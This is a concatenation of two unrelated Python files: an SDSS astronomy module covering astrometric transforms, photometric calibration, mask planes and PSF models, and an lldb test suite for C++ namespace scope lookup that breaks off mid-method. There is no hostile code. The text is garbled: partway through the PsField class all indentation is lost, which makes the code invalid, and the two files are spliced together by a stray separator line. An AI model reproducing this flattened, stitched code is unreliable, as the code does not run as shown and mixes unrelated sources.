    whole run) or in tsField files (in astrom/ or fastrom/).
    http://www.sdss.org/dr7/dm/flatFiles/asTrans.html
    In DR8, they are in asTrans files, or in the "frames".
    http://data.sdss3.org/datamodel/files/PHOTO_REDUX/RERUN/RUN/astrom/asTrans.html
    '''
    def __init__(self, *args, **kwargs):
        '''
        node, incl: in radians
        astrans: must be an object with fields:
        {a,b,c,d,e,f}[band]
        {ricut}[band]
        {drow0, drow1, drow2, drow3, dcol0, dcol1, dcol2, dcol3}[band]
        {csrow, cscol, ccrow, cccol}[band]
        cut_to_band: in DR8 frames files, the astrans elements are not arrays;
        in DR7 tsField files they are.
        Note about units in this class:
        mu,nu are in degrees (great circle coords)
        a,d are in degrees (mu0, nu0)
        b,c,e,f are in degrees/pixel (dmu,dnu/drow,dcol)
        drow0,dcol0 are in pixels (distortion coefficients order 0); dpixels
        drow1,dcol1 are unitless dpixels / pixel (distortion coefficients order 1)
        drow2,dcol2 are in 1/pixels (dpixels/pixel**2) (distortion coefficients order 2)
        drow3,dcol3 are in 1/pixels**2 (dpixels/pixel**3) (distortion coefficients order 3)
        csrow,cscol are in pixels/mag (color-dependent shift)
        ccrow,cccol are in pixels (non-color-dependent shift)
        '''
        super(AsTrans, self).__init__(*args, **kwargs)
        self.filetype = 'asTrans'
        self.node = kwargs.get('node', None)
        self.incl = kwargs.get('incl', None)
        astrans = kwargs.get('astrans', None)
        # Transform coefficients for this file's band, keyed by field name.
        self.trans = {}
        cut = kwargs.get('cut_to_band', True)
        if astrans is not None and hasattr(self, 'bandi'):
            for f in ['a','b','c','d','e','f', 'ricut',
                      'drow0', 'drow1', 'drow2', 'drow3',
                      'dcol0', 'dcol1', 'dcol2', 'dcol3',
                      'csrow', 'cscol', 'ccrow', 'cccol']:
                try:
                    if hasattr(astrans, f):
                        el = getattr(astrans, f)
                        if cut:
                            # DR7-style tables hold one value per band.
                            el = el[self.bandi]
                        self.trans[f] = el
                except:
                    print('failed to get astrans.' + f)
                    import traceback
                    traceback.print_exc()
                    pass
        # Pre-flatten the coefficients for the optional C helpers (see
        # radec_to_pixel_single_c, which passes self._cached to cutils).
        self._cache_vals()
    @staticmethod
    def read(fn, F=None, primhdr=None, table=None):
        '''
        Build an AsTrans from a "frame" file.
        F: fitsio.FITS object to use an already-open file.
        primhdr: FITS header object for the primary HDU.
        table: astrometry.util.fits table
        '''
        if F is None:
            import fitsio
            F = fitsio.FITS(fn)
        if primhdr is None:
            primhdr = F[0].read_header()
        band = primhdr['FILTER'].strip()
        run = primhdr['RUN']
        camcol = primhdr['CAMCOL']
        field = 0 # 'FRAME' != field
        if table is None:
            tab = fits_table(F[3].read(lower=True))
        else:
            tab = table
        assert(len(tab) == 1)
        tab = tab[0]
        # DR8 frames store scalar (non-per-band) coefficients: cut_to_band=False.
        return AsTrans(run, camcol, field, band,
                       node=np.deg2rad(tab.node),
                       incl=np.deg2rad(tab.incl),
                       astrans=tab, cut_to_band=False)
    def __str__(self):
        return (SdssFile.__str__(self) +
                ' (node=%g, incl=%g)' % (self.node, self.incl))
    def _cache_vals(self):
        # Flatten node/incl plus all coefficients (and the precomputed inverse
        # of the [b,c;e,f] matrix) into one list.
        # NOTE(review): the element ORDER here presumably matches the layout
        # expected by cutils.radec_to_pixel -- confirm before reordering.
        a, b, c, d, e, f = self._get_abcdef()
        determinant = b * f - c * e
        B = f / determinant
        C = -c / determinant
        E = -e / determinant
        F = b / determinant
        py,px, qy,qx = self._get_cscc()
        g0, g1, g2, g3 = self._get_drow()
        h0, h1, h2, h3 = self._get_dcol()
        color0 = self._get_ricut()
        self._cached = [self.node, self.incl,
                        a,b,c,d,e,f, B,C,E,F, px,py,qx,qy, g0,g1,g2,g3,
                        h0,h1,h2,h3, color0]
    def _get_abcdef(self):
        # Affine terms of the (row,col) -> (mu,nu) transform.
        return tuple(self.trans[x] for x in 'abcdef')
    def _get_drow(self):
        # Row-distortion polynomial coefficients (orders 0..3).
        return tuple(self.trans[x] for x in ['drow0', 'drow1', 'drow2', 'drow3'])
    def _get_dcol(self):
        # Column-distortion polynomial coefficients (orders 0..3).
        return tuple(self.trans[x] for x in ['dcol0', 'dcol1', 'dcol2', 'dcol3'])
    def _get_cscc(self):
        # Color-dependent (cs*) and constant (cc*) pixel shifts.
        return tuple(self.trans[x] for x in ['csrow', 'cscol', 'ccrow', 'cccol'])
    def _get_ricut(self):
        # Color threshold: below it the color-dependent shift applies.
        return self.trans['ricut']
    def cd_at_pixel(self, x, y, color=0):
        '''
        (x,y) to numpy array (2,2) -- the CD matrix at pixel x,y:
        [ [ dRA/dx * cos(Dec), dRA/dy * cos(Dec) ],
        [ dDec/dx , dDec/dy ] ]
        in FITS these are called:
        [ [ CD11 , CD12 ],
        [ CD21 , CD22 ] ]
        Note: these statements have not been verified by the FDA.
        '''
        # Finite-difference approximation with a 10-pixel step.
        ra0,dec0 = self.pixel_to_radec(x, y, color)
        step = 10. # pixels
        rax,decx = self.pixel_to_radec(x+step, y, color)
        ray,decy = self.pixel_to_radec(x, y+step, color)
        cosd = np.cos(np.deg2rad(dec0))
        return np.array([ [ (rax-ra0)/step * cosd, (ray-ra0)/step * cosd ],
                          [ (decx-dec0)/step , (decy-dec0)/step ] ])
    def pixel_to_radec(self, x, y, color=0):
        # pixel -> (mu,nu) -> (RA,Dec), all in degrees.
        mu, nu = self.pixel_to_munu(x, y, color)
        return self.munu_to_radec(mu, nu)
    def radec_to_pixel_single_py(self, ra, dec, color=0):
        '''RA,Dec -> x,y for scalar RA,Dec.'''
        # RA,Dec -> mu,nu -> prime -> pixel
        mu, nu = self.radec_to_munu_single(ra, dec)
        return self.munu_to_pixel_single(mu, nu, color)
    def radec_to_pixel_single_c(self, ra, dec):
        # Fast path through the compiled helper, using the flattened
        # coefficient list prepared by _cache_vals().
        return cutils.radec_to_pixel(float(ra), float(dec), self._cached)
    def radec_to_pixel(self, ra, dec, color=0):
        mu, nu = self.radec_to_munu(ra, dec)
        return self.munu_to_pixel(mu, nu, color)
    def munu_to_pixel(self, mu, nu, color=0):
        xprime, yprime = self.munu_to_prime(mu, nu, color)
        return self.prime_to_pixel(xprime, yprime, color=color)
    # Same implementation handles scalars.
    munu_to_pixel_single = munu_to_pixel
    def munu_to_prime(self, mu, nu, color=0):
        '''
        mu = a + b * rowm + c * colm
        nu = d + e * rowm + f * colm
        So
        [rowm; colm] = [b,c; e,f]^-1 * [mu-a; nu-d]
        [b,c; e,f]^1 = [B,C; E,F] in the code below, so
        [rowm; colm] = [B,C; E,F] * [mu-a; nu-d]
        '''
        a, b, c, d, e, f = self._get_abcdef()
        determinant = b * f - c * e
        B = f / determinant
        C = -c / determinant
        E = -e / determinant
        F = b / determinant
        mua = mu - a
        # in field 6955, g3, 809 we see a~413
        #if mua < -180.:
        # mua += 360.
        # Vectorized wrap of the commented-out scalar branch above.
        mua += 360. * (mua < -180.)
        yprime = B * mua + C * (nu - d)
        xprime = E * mua + F * (nu - d)
        return xprime,yprime
    def pixel_to_munu(self, x, y, color=0):
        # Apply distortion correction, then the affine transform to (mu,nu).
        (xprime, yprime) = self.pixel_to_prime(x, y, color)
        a, b, c, d, e, f = self._get_abcdef()
        mu = a + b * yprime + c * xprime
        nu = d + e * yprime + f * xprime
        return (mu, nu)
    def pixel_to_prime(self, x, y, color=0):
        # Secret decoder ring:
        # http://www.sdss.org/dr7/products/general/astrometry.html
        # (color)0 is called riCut;
        # g0, g1, g2, and g3 are called
        # dRow0, dRow1, dRow2, and dRow3, respectively;
        # h0, h1, h2, and h3 are called
        # dCol0, dCol1, dCol2, and dCol3, respectively;
        # px and py are called csRow and csCol, respectively;
        # and qx and qy are called ccRow and ccCol, respectively.
        color0 = self._get_ricut()
        g0, g1, g2, g3 = self._get_drow()
        h0, h1, h2, h3 = self._get_dcol()
        px, py, qx, qy = self._get_cscc()
        # #$(%*&^(%$%*& bad documentation.
        (px,py) = (py,px)
        (qx,qy) = (qy,qx)
        # Cubic distortion polynomials in x (column).
        yprime = y + g0 + g1 * x + g2 * x**2 + g3 * x**3
        xprime = x + h0 + h1 * x + h2 * x**2 + h3 * x**3
        # The code below implements this, vectorized:
        # if color < color0:
        # xprime += px * color
        # yprime += py * color
        # else:
        # xprime += qx
        # yprime += qy
        qx = qx * np.ones_like(x)
        qy = qy * np.ones_like(y)
        xprime += np.where(color < color0, px * color, qx)
        yprime += np.where(color < color0, py * color, qy)
        return (xprime, yprime)
    def prime_to_pixel(self, xprime, yprime, color=0):
        # Inverse of pixel_to_prime.
        # NOTE(review): the -= below mutates xprime/yprime IN PLACE when they
        # are numpy arrays.
        color0 = self._get_ricut()
        g0, g1, g2, g3 = self._get_drow()
        h0, h1, h2, h3 = self._get_dcol()
        px, py, qx, qy = self._get_cscc()
        # #$(%*&^(%$%*& bad documentation.
        (px,py) = (py,px)
        (qx,qy) = (qy,qx)
        qx = qx * np.ones_like(xprime)
        qy = qy * np.ones_like(yprime)
        xprime -= np.where(color < color0, px * color, qx)
        yprime -= np.where(color < color0, py * color, qy)
        # Now invert:
        # yprime = y + g0 + g1 * x + g2 * x**2 + g3 * x**3
        # xprime = x + h0 + h1 * x + h2 * x**2 + h3 * x**3
        x = xprime - h0
        # dumb-ass Newton's method
        dx = 1.
        # FIXME -- should just update the ones that aren't zero
        # FIXME -- should put in some failsafe...
        while np.max(np.abs(np.atleast_1d(dx))) > 1e-10:
            xp = x + h0 + h1 * x + h2 * x**2 + h3 * x**3
            dxpdx = 1 + h1 + h2 * 2*x + h3 * 3*x**2
            dx = (xprime - xp) / dxpdx
            x += dx
        # The y polynomial depends only on x, so it inverts directly.
        y = yprime - (g0 + g1 * x + g2 * x**2 + g3 * x**3)
        return (x, y)
    def radec_to_munu_single_c(self, ra, dec):
        ''' Compute ra,dec to mu,nu for a single RA,Dec, calling C code'''
        mu,nu = cutils.radec_to_munu(ra, dec, self.node, self.incl)
        return mu,nu
    def radec_to_munu(self, ra, dec):
        '''
        RA,Dec in degrees
        mu,nu (great circle coords) in degrees
        '''
        node,incl = self.node, self.incl
        assert(ra is not None)
        assert(dec is not None)
        ra, dec = np.deg2rad(ra), np.deg2rad(dec)
        mu = node + np.arctan2(np.sin(ra - node) * np.cos(dec) * np.cos(incl) +
                               np.sin(dec) * np.sin(incl),
                               np.cos(ra - node) * np.cos(dec))
        nu = np.arcsin(-np.sin(ra - node) * np.cos(dec) * np.sin(incl) +
                       np.sin(dec) * np.cos(incl))
        mu, nu = np.rad2deg(mu), np.rad2deg(nu)
        # Wrap mu into [0, 360].
        mu += (360. * (mu < 0))
        mu -= (360. * (mu > 360))
        return (mu, nu)
    def munu_to_radec(self, mu, nu):
        node,incl = self.node, self.incl
        assert(mu is not None)
        assert(nu is not None)
        # just in case you thought we needed *more* rad/deg conversions...
        return munu_to_radec_deg(mu, nu, np.rad2deg(node), np.rad2deg(incl))
# Bind the single-point transform entry points on AsTrans: use the compiled
# cutils implementations when the extension imported, otherwise the
# pure-Python fallbacks.
if cutils is None:
    AsTrans.radec_to_munu_single = AsTrans.radec_to_munu
    AsTrans.radec_to_pixel_single = AsTrans.radec_to_pixel_single_py
else:
    AsTrans.radec_to_munu_single = AsTrans.radec_to_munu_single_c
    AsTrans.radec_to_pixel_single = AsTrans.radec_to_pixel_single_c
class TsField(SdssFile):
    """tsField calibration file for one field: photometric terms (aa, kk,
    airmass) and the astrometric transform (asTrans) used by the
    count/magnitude conversion methods below."""
    def __init__(self, *args, **kwargs):
        super(TsField, self).__init__(*args, **kwargs)
        self.filetype = 'tsField'
        # Exposure-time constant used by all the count<->mag conversions below.
        self.exptime = 53.907456
    def setHdus(self, p):
        # p: opened FITS HDU list; HDU 1 holds a single-row calibration table.
        self.hdus = p
        self.table = fits_table(self.hdus[1].data)[0]
        T = self.table
        self.aa = T.aa.astype(float)
        self.kk = T.kk.astype(float)
        self.airmass = T.airmass
    def getAsTrans(self, band):
        """Build an AsTrans astrometric transform for the given band."""
        # NOTE(review): bandi is computed but never used below.
        bandi = band_index(band)
        band = band_name(band)
        #node,incl = self.getNode(), self.getIncl()
        # node/incl come from the primary header, in degrees; convert to rad.
        hdr = self.hdus[0].header
        node = np.deg2rad(hdr.get('NODE'))
        incl = np.deg2rad(hdr.get('INCL'))
        asTrans = AsTrans(self.run, self.camcol, self.field, band=band,
                          node=node, incl=incl, astrans=self.table)
        return asTrans
    #magL = -(2.5/ln(10))*[asinh((f/f0)/2b)+ln(b)]
    # luptitude == arcsinh mag
    # band: int
    def luptitude_to_counts(self, L, band):
        """Convert asinh magnitudes (luptitudes) L to counts, using the
        per-band softening parameter and this field's calibration."""
        # from arcsinh softening parameters table
        # http://www.sdss.org/dr7/algorithms/fluxcal.html#counts2mag
        b = [1.4e-10, 0.9e-10, 1.2e-10, 1.8e-10, 7.4e-10]
        b = b[band]
        maggies = 2.*b * np.sinh(-0.4 * np.log(10.) * L - np.log(b))
        dlogcounts = -0.4 * (self.aa[band] + self.kk[band] * self.airmass[band])
        return (maggies * self.exptime) * 10.**dlogcounts
    def get_zeropoint(self, band):
        """Photometric zeropoint for the given band index."""
        return (2.5 * np.log10(self.exptime)
                -(self.aa[band] + self.kk[band] * self.airmass[band]))
    # band: int
    def mag_to_counts(self, mag, band):
        """Convert a (Pogson) magnitude to counts in the given band."""
        # log_10(counts)
        logcounts = (-0.4 * mag + np.log10(self.exptime)
                     - 0.4*(self.aa[band] + self.kk[band] * self.airmass[band]))
        #logcounts = np.minimum(logcounts, 308.)
        #olderrs = np.seterr(all='print')
        rtn = 10.**logcounts
        #np.seterr(**olderrs)
        return rtn
    def counts_to_mag(self, counts, band):
        """Inverse of mag_to_counts: counts to (Pogson) magnitude."""
        # http://www.sdss.org/dr5/algorithms/fluxcal.html#counts2mag
        # f/f0 = counts/exptime * 10**0.4*(aa + kk * airmass)
        # mag = -2.5 * log10(f/f0)
        return -2.5 * (np.log10(counts / self.exptime) +
                       0.4 * (self.aa[band] + self.kk[band] * self.airmass[band]))
class FpObjc(SdssFile):
    """fpObjc file: only tags the filetype; data access happens elsewhere."""
    def __init__(self, *args, **kwargs):
        super(FpObjc, self).__init__(*args, **kwargs)
        self.filetype = 'fpObjc'
class FpM(SdssFile):
    """fpM file: per-band image mask planes, read lazily from its HDUs."""
    def __init__(self, *args, **kwargs):
        super(FpM, self).__init__(*args, **kwargs)
        self.filetype = 'fpM'
        # Lazily-built map of mask-plane name -> HDU offset; see getMaskPlane.
        self.maskmap = None
    def setHdus(self, p):
        # p: opened FITS HDU list for this fpM file.
        self.hdus = p
    def getMaskPlane(self, name):
        """Return the rectangle table for mask plane 'name' (None if empty).

        Raises RuntimeError for an unknown plane name.
        """
        # Mask planes are described in HDU 11 (the last HDU)
        if self.maskmap is None:
            self.maskmap = {}
            T = fits_table(self.hdus[-1].data)
            T.cut(T.defname == 'S_MASKTYPE')
            for k,v in zip(T.attributename, T.value):
                # Plane names are stored with an S_MASK_ prefix; strip it.
                k = k.replace('S_MASK_', '')
                if k == 'S_NMASK_TYPES':
                    continue
                self.maskmap[k] = v
        if not name in self.maskmap:
            raise RuntimeError('Unknown mask plane \"%s\"' % name)
        data = self.hdus[1 + self.maskmap[name]].data
        try:
            # fitsio path: an empty table means no masked regions.
            if data.get_nrows() == 0:
                return None
        except:
            pass
        return fits_table(data)
    def setMaskedPixels(self, name, img, val, roi=None):
        """Set img[y, x] = val for every pixel covered by mask plane 'name'.

        roi: optional (x0, x1, y0, y1) crop; rectangles are then clipped to
        and expressed relative to that region.
        """
        M = self.getMaskPlane(name)
        if M is None:
            return
        if roi is not None:
            x0,x1,y0,y1 = roi
        # Each table row is one rectangle: rows [rmin..rmax], cols [cmin..cmax].
        for (c0,c1,r0,r1,coff,roff) in zip(M.cmin,M.cmax,M.rmin,M.rmax,
                                           M.col0, M.row0):
            assert(coff == 0)
            assert(roff == 0)
            if roi is not None:
                (outx,nil) = get_overlapping_region(c0-x0, c1+1-x0, 0, x1-x0)
                (outy,nil) = get_overlapping_region(r0-y0, r1+1-y0, 0, y1-y0)
                img[outy,outx] = val
            else:
                img[r0:r1+1, c0:c1+1] = val
class FpC(SdssFile):
    """fpC file (image frame); image and header are attached externally."""
    def __init__(self, *args, **kwargs):
        super(FpC, self).__init__(*args, **kwargs)
        self.filetype = 'fpC'
    def getImage(self):
        # NOTE(review): self.image is set by the loader, not in this class.
        return self.image
    def getHeader(self):
        # NOTE(review): self.header is likewise set externally.
        return self.header
class PsField(SdssFile):
    def __init__(self, *args, **kwargs):
        """psField file: PSF model and calibration parameters for one field."""
        super(PsField, self).__init__(*args, **kwargs)
        self.filetype = 'psField'
    def setHdus(self, p):
        """Extract gains, sky levels and PSF-model parameters from HDU list p."""
        self.hdus = p
        t = fits_table(p[6].data)
        # the table has only one row...
        assert(len(t) == 1)
        t = t[0]
        #self.table = t
        self.gain = t.gain
        self.dark_variance = t.dark_variance
        self.sky = t.sky
        self.skyerr = t.skyerr
        self.psp_status = t.status
        # Double-Gaussian PSF params
        self.dgpsf_s1 = t.psf_sigma1_2g
        self.dgpsf_s2 = t.psf_sigma2_2g
        self.dgpsf_b = t.psf_b_2g
        # summary PSF width (sigmas)
        # 2*sqrt(2*ln 2) converts a Gaussian sigma to FWHM.
        self.psf_fwhm = t.psf_width * (2.*np.sqrt(2.*np.log(2.)))
        # 2-gaussian plus power-law PSF params
        self.plpsf_s1 = t.psf_sigma1
        self.plpsf_s2 = t.psf_sigma2
        self.plpsf_b = t.psf_b
        self.plpsf_p0 = t.psf_p0
        self.plpsf_beta = t.psf_beta
        self.plpsf_sigmap = t.psf_sigmap
        # Aperture corrections, one per run, from HDU 8.
        t = fits_table(p[8].data)
        self.per_run_apcorrs = t.ap_corr_run
def getPowerLaw(self, bandnum):
''' Returns:
(a1, sigma_1,
a2, sigma_2,
a3, sigma_power, beta_power)
Where a1 is the amplitude of the first Gaussian and sigma_1 is
its standard deviation; a2 and sigma_2 are the same for the
second Gaussian component, and a3 is the amplitude for the
power-law component. Sigma is the scale length, beta the
power.
RHL claims:
func = a*[exp(-x^2/(2*sigmax1^2) - y^2/(2*sigmay1^2)) +
b*exp(-x^2/(2*sigmax2^2) - y^2/(2*sigmay2^2)) +
p0*(1 + r^2/(beta*sigmap^2))^{-beta/2}]
'''
return (1., self.plpsf_s1[bandnum],
self.plpsf_b[bandnum], self.plpsf_s1[bandnum],
self.plpsf_p0[bandnum], self.plpsf_sigmap[bandnum],
self.plpsf_beta[bandnum])
def getPsfFwhm(self, bandnum):
return self.psf_fwhm[bandnum]
def getDoubleGaussian(self, bandnum, normalize=False):
# http://www.sdss.org/dr7/dm/flatFiles/psField.html
# good = PSP_FIELD_OK
status = self.psp_status[bandnum]
if status != 0:
print('Warning: PsField status[band=%s] =' % (bandnum), status)
# b is the "ratio of G2 to G1 at the origin", ie, not the
# straight Gaussian amplitudes
a = 1.0
s1 = self.dgpsf_s1[bandnum]
s2 = self.dgpsf_s2[bandnum]
b = self.dgpsf_b[bandnum]
# value at center is 1./(2.*pi*sigma**2)
if normalize:
b *= (s2/s1)**2
absum = (a + b)
a /= absum
b /= absum
return (float(a), float(s1), float(b), float(s2))
def getEigenPsfs(self, bandnum):
'''
Returns a numpy array of shape, eg, (4, 51, 51).
'''
T = fits_table(self.hdus[bandnum+1].data)
psfs = []
for psf,h,w in zip(T.rrows, T.rnrow, T.rncol):
psfs.append(psf.reshape((h,w)))
psfs = np.array(psfs)
return psfs
def getEigenPolynomials(self, bandnum):
'''
Returns [ (xorder, yorder, coeffs), (xorder, yorder, coeffs), ...]
one tuple per eigen-PSF.
xorder and yorder are np arrays of integers
coeffs is a numpy array of floating-point coefficients
'''
T = fits_table(self.hdus[bandnum+1].data)
terms = []
for k in range(len(T)):
nrb = T.nrow_b[k]
ncb = T.ncol_b[k]
c = T.c[k]
# !!!
c = c.copy()
c = c.reshape(5, 5)
c = c[:nrb,:ncb]
(gridc,gridr) = np.meshgrid(np.arange(ncb), np.arange(nrb))
# remove the 1e-3 coordinate prescaling
c *= (1e-3 ** (gridr + gridc))
I = np.flatnonzero(c)
terms.append((gridr.flat[I], gridc.flat[I], c.flat[I]))
return terms
def correlateEigenPsf(self, bandnum, img):
from scipy.ndimage.filters import correlate
eigenpsfs = self.getEigenPsfs(bandnum)
eigenterms = self.getEigenPolynomials(bandnum)
H,W = img.shape
corr = np.zeros((H,W))
xx,yy = np.arange(W).astype(float), np.arange(H).astype(float)
for epsf, (XO,YO,C) in zip(eigenpsfs, eigenterms):
k = reduce(np.add, [np.outer(yy**yo, xx**xo) * c
for xo,yo,c in zip(XO,YO,C)])
assert(k.shape == img.shape)
# Trim symmetric zero-padding off the epsf.
# This will fail spectacularly given an all-zero eigen-component.
while True:
H,W = epsf.shape
if (np.all(epsf[:,0] == 0) and np.all(epsf[:,-1] == 0) and
np.all(epsf[0,:] == 0) and np.all(epsf[-1,:] == 0)):
# Trim!
epsf = epsf[1:-1, 1:-1]
else:
break
corr += k * correlate(img, epsf)
return corr
def getPsfAtPoints(self, bandnum, x, y):
'''
Reconstruct the SDSS model PSF from KL basis functions.
x,y can be scalars or 1-d numpy arrays.
Return value:
if x,y are scalars: a PSF image
if x,y are arrays: a list of PSF images
'''
rtnscalar = np.isscalar(x) and np.isscalar(y)
x = np.atleast_1d(x).astype(float)
y = np.atleast_1d(y).astype(float)
eigenpsfs = self.getEigenPsfs(bandnum)
eigenpolys = self.getEigenPolynomials(bandnum)
# From the IDL docs:
# http://photo.astro.princeton.edu/photoop_doc.html#SDSS_PSF_RECON
# acoeff_k = SUM_i{ SUM_j{ (0.001*ROWC)^i * (0.001*COLC)^j * C_k_ij } }
# psfimage = SUM_k{ acoeff_k * RROWS_k }
# we assume all the eigen-psfs are the same size.
assert(len(np.unique([psf.shape for psf in eigenpsfs])) == 1)
xx,yy = np.broadcast_arrays(x, y)
N = len(xx.flat)
psfimgs = np.zeros((N,) + eigenpsfs[0].shape)
for epsf, (XO, YO, C) in zip(eigenpsfs, eigenpolys):
kk = reduce(np.add, [(xx.flat ** xo) * (yy.flat ** yo) * c
for (xo,yo,c) in zip(XO,YO,C)])
psfimgs += epsf[np.newaxis,:,:] * kk[:,np.newaxis,np.newaxis]
if rtnscalar:
return psfimgs[0,:,:]
# convert back to a list...
return [psfimgs[i,:,:] for i in range(N)]
def getGain(self, band=None):
if band is not None:
return self.gain[band]
return self.gain
def getDarkVariance(self, band=None):
if band is not None:
return self.dark_variance[band]
return self.dark_variance
def getSky(self, band=None):
if band is not None:
return self.sky[band]
return self.sky
def getSkyErr(self, band=None):
if band is not None:
return self.skyerr[band]
return self.skyerr
| |
"""
Test the printing of anonymous and named namespace variables.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class NamespaceLookupTestCase(TestBase):
    # Exercises lldb expression-evaluation name lookup at breakpoints
    # placed in different C++ scopes (global, file-static, namespace,
    # nested namespace, before/after using directives/declarations).

    mydir = TestBase.compute_mydir(__file__)

    def setUp(self):
        # Call super's setUp().
        TestBase.setUp(self)
        # Break inside different scopes and evaluate value
        self.line_break_global_scope = line_number(
            'ns.cpp', '// BP_global_scope')
        self.line_break_file_scope = line_number('ns2.cpp', '// BP_file_scope')
        self.line_break_ns_scope = line_number('ns2.cpp', '// BP_ns_scope')
        self.line_break_nested_ns_scope = line_number(
            'ns2.cpp', '// BP_nested_ns_scope')
        self.line_break_nested_ns_scope_after_using = line_number(
            'ns2.cpp', '// BP_nested_ns_scope_after_using')
        self.line_break_before_using_directive = line_number(
            'ns3.cpp', '// BP_before_using_directive')
        self.line_break_after_using_directive = line_number(
            'ns3.cpp', '// BP_after_using_directive')

    def runToBkpt(self, command):
        # Helper: run/continue and assert we stopped at a breakpoint.
        self.runCmd(command, RUN_SUCCEEDED)
        # The stop reason of the thread should be breakpoint.
        self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
                    substrs=['stopped',
                             'stop reason = breakpoint'])

    @expectedFailureAll(
        oslist=["freebsd"],
        bugnumber="llvm.org/pr25819")
    @skipIfWindows  # This is flakey on Windows: llvm.org/pr38373
    def test_scope_lookup_with_run_command(self):
        """Test scope lookup of functions in lldb."""
        self.build()
        self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns.cpp",
            self.line_break_global_scope,
            num_expected_locations=1,
            loc_exact=False)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns2.cpp",
            self.line_break_ns_scope,
            num_expected_locations=1,
            loc_exact=False)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns2.cpp",
            self.line_break_nested_ns_scope,
            num_expected_locations=1,
            loc_exact=False)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns2.cpp",
            self.line_break_nested_ns_scope_after_using,
            num_expected_locations=1,
            loc_exact=False)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns3.cpp",
            self.line_break_before_using_directive,
            num_expected_locations=1,
            loc_exact=False)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns3.cpp",
            self.line_break_after_using_directive,
            num_expected_locations=1,
            loc_exact=False)

        # Run to BP_global_scope at global scope
        self.runToBkpt("run")
        # Evaluate func() - should call ::func()
        self.expect("expr -- func()", startstr="(int) $0 = 1")
        # Evaluate A::B::func() - should call A::B::func()
        self.expect("expr -- A::B::func()", startstr="(int) $1 = 4")
        # Evaluate func(10) - should call ::func(int)
        self.expect("expr -- func(10)", startstr="(int) $2 = 11")

        # Evaluate ::func() - should call A::func()
        self.expect("expr -- ::func()", startstr="(int) $3 = 1")
        # Evaluate A::foo() - should call A::foo()
        self.expect("expr -- A::foo()", startstr="(int) $4 = 42")

        # Continue to BP_ns_scope at ns scope
        self.runToBkpt("continue")
        # Evaluate func(10) - should call A::func(int)
        self.expect("expr -- func(10)", startstr="(int) $5 = 13")
        # Evaluate B::func() - should call B::func()
        self.expect("expr -- B::func()", startstr="(int) $6 = 4")
        # Evaluate func() - should call A::func()
        self.expect("expr -- func()", startstr="(int) $7 = 3")

        # Continue to BP_nested_ns_scope at nested ns scope
        self.runToBkpt("continue")
        # Evaluate func() - should call A::B::func()
        self.expect("expr -- func()", startstr="(int) $8 = 4")
        # Evaluate A::func() - should call A::func()
        self.expect("expr -- A::func()", startstr="(int) $9 = 3")

        # Evaluate func(10) - should call A::func(10)
        # NOTE: Under the rules of C++, this test would normally get an error
        # because A::B::func() hides A::func(), but lldb intentionally
        # disobeys these rules so that the intended overload can be found
        # by only removing duplicates if they have the same type.
        self.expect("expr -- func(10)", startstr="(int) $10 = 13")

        # Continue to BP_nested_ns_scope_after_using at nested ns scope after
        # using declaration
        self.runToBkpt("continue")
        # Evaluate A::func(10) - should call A::func(int)
        self.expect("expr -- A::func(10)", startstr="(int) $11 = 13")

        # Continue to BP_before_using_directive at global scope before using
        # declaration
        self.runToBkpt("continue")
        # Evaluate ::func() - should call ::func()
        self.expect("expr -- ::func()", startstr="(int) $12 = 1")
        # Evaluate B::func() - should call B::func()
        self.expect("expr -- B::func()", startstr="(int) $13 = 4")

        # Continue to BP_after_using_directive at global scope after using
        # declaration
        self.runToBkpt("continue")
        # Evaluate ::func() - should call ::func()
        self.expect("expr -- ::func()", startstr="(int) $14 = 1")
        # Evaluate B::func() - should call B::func()
        self.expect("expr -- B::func()", startstr="(int) $15 = 4")

    @expectedFailure("lldb scope lookup of functions bugs")
    def test_function_scope_lookup_with_run_command(self):
        """Test scope lookup of functions in lldb."""
        self.build()
        self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns.cpp",
            self.line_break_global_scope,
            num_expected_locations=1,
            loc_exact=False)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns2.cpp",
            self.line_break_ns_scope,
            num_expected_locations=1,
            loc_exact=False)

        # Run to BP_global_scope at global scope
        self.runToBkpt("run")
        # Evaluate foo() - should call ::foo()
        # FIXME: lldb finds Y::foo because lookup for variables is done
        # before functions.
        self.expect("expr -- foo()", startstr="(int) $0 = 42")
        # Evaluate ::foo() - should call ::foo()
        # FIXME: lldb finds Y::foo because lookup for variables is done
        # before functions and :: is ignored.
        self.expect("expr -- ::foo()", startstr="(int) $1 = 42")

        # Continue to BP_ns_scope at ns scope
        self.runToBkpt("continue")
        # Evaluate foo() - should call A::foo()
        # FIXME: lldb finds Y::foo because lookup for variables is done
        # before functions.
        self.expect("expr -- foo()", startstr="(int) $2 = 42")

    @expectedFailure("lldb file scope lookup bugs")
    @skipIfWindows  # This is flakey on Windows: llvm.org/pr38373
    def test_file_scope_lookup_with_run_command(self):
        """Test file scope lookup in lldb."""
        self.build()
        self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns2.cpp",
            self.line_break_file_scope,
            num_expected_locations=1,
            loc_exact=False)

        # Run to BP_file_scope at file scope
        self.runToBkpt("run")
        # Evaluate func() - should call static ns2.cpp:func()
        # FIXME: This test fails because lldb doesn't know about file scopes so
        # finds the global ::func().
        self.expect("expr -- func()", startstr="(int) $0 = 2")

    @skipIfWindows  # This is flakey on Windows: llvm.org/pr38373
    def test_scope_lookup_before_using_with_run_command(self):
        """Test scope lookup before using in lldb."""
        self.build()
        self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
        lldbutil.run_break_set_by_file_and_line(
            self,
            "ns3.cpp",
            self.line_break_before_using_directive,
            num_expected_locations=1,
            loc_exact=False)

        # Run to BP_before_using_directive at global scope before using
        # declaration
        self.runToBkpt("run")
